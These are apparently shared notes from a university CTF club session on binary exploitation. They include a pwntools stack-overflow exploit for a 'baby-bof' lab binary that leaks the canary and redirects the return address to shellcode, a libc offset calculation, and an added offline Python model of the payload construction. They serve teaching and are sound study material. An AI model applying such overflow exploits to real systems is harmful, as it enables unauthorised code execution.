# NCtfU - 3/18(r8)

###### tags: `nctfu2022spring`

## Start time
- 8:10 PM

## YouTube link
https://youtu.be/6H5QhGndg7I (contact r8 if you need access)

## Attending
- idisused
- sixkwnp
- ppodds
- Mark
- le37

## Speaker's notes
[NCtfU - 3/11(r8) - HackMD](https://hackmd.io/xiPPIRpHSZyTBcMQeovGCA)

The environment has been updated, so the Docker image has to be rebuilt from the Dockerfile:
```
Pwn tooling one-shot install
https://github.com/r888800009/CTF-tool/tree/master/pwn_docker
```

~~[Slides](https://drive.google.com/file/d/16bRddadTbktnRE9aKaCvFzSvjvRDwR6P/view?usp=sharing)~~
[Slides (corrected version)](https://drive.google.com/file/d/1BvtyFUjeoKrPTln8YIGsqhL8_P4iDjbe/view?usp=sharing) (contact r8 if you need access)

### outline
- Get started with reverse engineering
- Stack-based Buffer Overflows (Stack Smashing)
- Shellcode
- Return-Oriented Programming (ROP)

[Feedback form](https://docs.google.com/forms/d/e/1FAIpQLSfIw0OI3H26h6OtiP6zd9fU8l5QXyUOPqUA0QRd2O2RGHfqLQ/viewform)

## Shared notes

### LAB (15 minutes) Patch and struct reversing
`[rbp-8] + 18h`: `rbp-8` is a slot on the stack, so the pointer to the struct is stored on the stack at `rbp-8`. Dereferencing it gives a heap pointer, and `id` lives at offset +24 (0x18) inside the heap-allocated struct.

![](https://i.imgur.com/yo2osRp.png)

### LAB baby-bof
<!-- first attempt: weaker exploit that does not compute the ELF base
```python=
from pwn import *

#con=process("./baby-bof")
con=remote("localhost",30001)

con.recvuntil(")\n")
canary=int(con.recvline().split(b": ")[1][:-1],16) # leak line 1: the stack canary
con.recvline()                                       # leak line 2: not needed
shell=int(con.recvline().split(b": ")[1][:-1],16)+76 # leak line 3: a .text address; +76 is the shellcode
log.info("canary: "+hex(canary))
log.info("shell: "+hex(shell))

# payload: 8-byte buffer | canary | 8 bytes of saved rbp | return address -> shellcode
con.sendlineafter(b"bof: ",b"A"*8+p64(canary)+b"B"*8+p64(shell))
con.interactive()
```
-->
```python=
from pwn import *

#con=process("./baby-bof")
con=remote("localhost",30001)
elf=ELF("./baby-bof")

con.recvuntil(")\n")
canary=int(con.recvline().split(b": ")[1][:-1],16) # leak line 1: the stack canary ([:-1] strips the newline)
con.recvline()                                       # leak line 2: not needed
elf.address=int(con.recvline().split(b": ")[1][:-1],16)-0x131c # leak line 3: a .text address; -0x131c gives the ELF base
log.info("canary: "+hex(canary))
log.info("elf base: "+hex(elf.address))
log.info("shell: "+hex(elf.symbols["shellcode"]))   # symbol is resolved relative to the rebased ELF

# payload: 8-byte buffer | canary (must stay intact) | 8 bytes of saved rbp | return address -> shellcode symbol
con.sendlineafter(b"bof: ",b"A"*8+p64(canary)+b"B"*8+p64(elf.symbols["shellcode"]))
con.interactive()
```

### LAB ret2sc

### LAB One-gadget
![](https://i.imgur.com/S9kQ1OT.png)

Computing the offset of the leaked libc address from the libc load address in gef:
```
gef➤ p 0x00007ffff7df30b3-0x00007ffff7dcf000
$2 = 0x240b3
```
> My libc seems to load at a different address
- That's probably because it wasn't run in Docker
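The following script is an added example, not code from these notes or from r8's slides. It models offline what the baby-bof exploit above does on the wire (parse the leaks, rebase, build the payload) and applies the same leak-minus-offset step to the libc offset computed in the One-gadget section, without pwntools so it runs with nothing but the standard library. Assumptions: the banner below is constructed to match only what the exploit relies on (a line ending in `)`, three `label: 0x...` lines, the `bof: ` prompt); the 8-byte buffer and 8-byte saved rbp are read off the payload `"A"*8 + canary + "B"*8 + ret`; the shellcode offset `0x1368` is derived from the two exploit versions (`leak - 0x131c` is the base and `leak + 76` is the shellcode). The two sanity checks, page-aligned base and zero low byte of the canary, are what catches the situation in the quote above: an offset such as `0x240b3` is only valid for the libc build it was measured on, and a different build yields an unaligned "base".

```python
"""Offline model of the baby-bof leak handling and of the libc offset check.

Added example; not the notes' or r8's code. Talks to no service and needs no
pwntools. SAMPLE_BANNER is constructed, not captured from the real challenge.
"""
import struct

# Offsets taken from the two exploit versions in the notes:
#   elf_base  = leak3 - 0x131c   (final version)
#   shellcode = leak3 + 76       (first, commented-out version)
# so the shellcode symbol sits at elf_base + 0x131c + 76 = elf_base + 0x1368.
LEAK_TO_ELF_BASE = 0x131c
LEAK_TO_SHELLCODE = 76
SHELLCODE_OFFSET = LEAK_TO_ELF_BASE + LEAK_TO_SHELLCODE   # 0x1368

# From the gef calculation in the One-gadget section
# (0x7ffff7df30b3 - 0x7ffff7dcf000). Valid only for the libc build it came from.
LIBC_LEAK_OFFSET = 0x240b3

BUF_SIZE = 8        # assumed from the "A"*8 before the canary in the payload
SAVED_RBP_SIZE = 8  # assumed from the "B"*8 between canary and return address

# Constructed sample banner matching the exploit's recv sequence.
SAMPLE_BANNER = (
    b"Welcome to baby-bof (leaks below)\n"
    b"1: 0x2a4f91c3d7e6b500\n"
    b"2: 0x7ffd1234abcd\n"
    b"3: 0x55555555531c\n"
    b"bof: "
)


def parse_leaks(banner: bytes) -> dict:
    """Mirror the exploit: skip past ")\\n", then read three "label: 0x..."
    lines; line 1 is the canary, line 3 is the .text leak (line 2 is unused)."""
    _, _, body = banner.partition(b")\n")
    lines = body.split(b"\n")[:3]
    if len(lines) != 3:
        raise ValueError("banner does not contain three leak lines")
    values = []
    for line in lines:
        _label, sep, hexval = line.partition(b": ")
        if not sep:
            raise ValueError(f"unexpected leak line: {line!r}")
        values.append(int(hexval.decode(), 16))
    return {"canary": values[0], "text_leak": values[2]}


def canary_looks_valid(canary: int) -> bool:
    """glibc's x86-64 stack canary always has a zero low byte; anything else
    means the wrong banner line was parsed as the canary."""
    return 0 <= canary < 2**64 and (canary & 0xff) == 0


def looks_like_base(addr: int) -> bool:
    """Load bases are page-aligned; an unaligned result means the leak-to-base
    offset was measured on a different build of the binary or libc."""
    return addr > 0 and (addr & 0xfff) == 0


def base_from_leak(leak: int, offset: int, what: str) -> int:
    base = leak - offset
    if not looks_like_base(base):
        raise ValueError(f"{what} base {base:#x} is not page-aligned: "
                         f"offset {offset:#x} does not match this build")
    return base


def shellcode_addr(elf_base: int) -> int:
    return elf_base + SHELLCODE_OFFSET


def build_payload(canary: int, ret_addr: int) -> bytes:
    """buffer | canary | saved rbp | return address, little-endian 64-bit.
    A 0x0a byte inside the payload would end a line-based read early, so
    refuse it instead of sending a silently truncated line."""
    payload = (b"A" * BUF_SIZE
               + struct.pack("<Q", canary)
               + b"B" * SAVED_RBP_SIZE
               + struct.pack("<Q", ret_addr))
    if b"\n" in payload:
        raise ValueError("payload contains a newline; a line-based read would truncate it")
    return payload


def plan_exploit(banner: bytes = SAMPLE_BANNER) -> dict:
    """Whole pipeline on a banner; returns the values the real exploit logs."""
    leaks = parse_leaks(banner)
    if not canary_looks_valid(leaks["canary"]):
        raise ValueError(f"canary {leaks['canary']:#x} has a non-zero low byte")
    elf_base = base_from_leak(leaks["text_leak"], LEAK_TO_ELF_BASE, "ELF")
    target = shellcode_addr(elf_base)
    # The first version's leak3 + 76 must land on the same address.
    assert target == leaks["text_leak"] + LEAK_TO_SHELLCODE
    return {"canary": leaks["canary"], "elf_base": elf_base,
            "shellcode": target, "payload": build_payload(leaks["canary"], target)}


if __name__ == "__main__":
    plan = plan_exploit()
    for k, v in plan.items():
        print(k, v.hex() if isinstance(v, bytes) else hex(v))
    print("libc base:", hex(base_from_leak(0x7ffff7df30b3, LIBC_LEAK_OFFSET, "libc")))
```

Swapping `0x240b3` for an offset from another libc build makes `base_from_leak` raise, which is the quick way to tell "wrong offset table" apart from "exploit logic bug" when the one-gadget does not fire outside the Docker environment.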